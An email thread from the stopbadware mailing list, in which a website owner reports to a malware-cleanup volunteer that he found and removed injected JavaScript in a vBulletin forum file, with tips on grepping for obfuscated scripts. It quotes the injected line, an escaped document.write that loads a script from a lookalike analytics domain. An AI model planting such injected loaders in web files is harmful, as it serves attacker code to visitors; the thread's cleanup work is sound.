Denis -
Thank you so much for taking the time to look through the URLs and provide
assistance. I did a grep looking for 'document.write, unescape, and eval'
and found 1 link that was bad. It was buried in some .js on a forum include
file:
httpdocs/forums/clientscript/vbulletin_md5.js:document.writeln("document.write(unescape(\"%3Cscript%20type%3D%22text\/javascript%22%20src%3D%22http%3A\/\/
www.google-analytices.com\/ga.js%22%3E%3C\/script%3E\"))");
I removed it. It appeared the file had write permissions on the server, so
I changed that, too.
This appears to be a different domain listed on my diagnostic page, but it
is VERY similar, so I'm thinking this could've been the culprit...
especially since I couldn't find anything else using GREP or searching the
DB.
Do you think this was it? Again, I thank you!
steve
On Thu, Oct 2, 2008 at 4:52 AM, UseShots <[EMAIL PROTECTED]> wrote:
>
> Hi Steve,
>
> I couldn't find anything suspicious on the mentioned web pages. By
> the way, the last page requires a login so I wonder how Google checked
> that page.
>
> Sometimes the plain search is now enough. Malicious scripts are
> usually obfuscated, so you won't see the domain names in plain text.
> You can try to search for scripts with words "unescape", "eval",
> "document.write". The search will return quite a few legitimate
> scripts but may also help you find "malicious" scripts if they are
> there.
>
> Another concern is user submitted content. Do you allow to insert
> Flash ojects from other sites in forum posts? Without latest security
> updates, some flash files can be harmful. The same may apply to some
> other types of user submitted content.
>
> P.S. I don't think AdSense is to blame.
>
> Denis
> http://UnmaskParasites.com
> >
>
--
:::steve thompson:::
http://www.stevejthompson.com
--~--~---------~--~----~------------~-------~--~----~
You received this message through the Google Groups "stopbadware" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/stopbadware?hl=en
-~----------~----~----~----~------~----~------~--~---
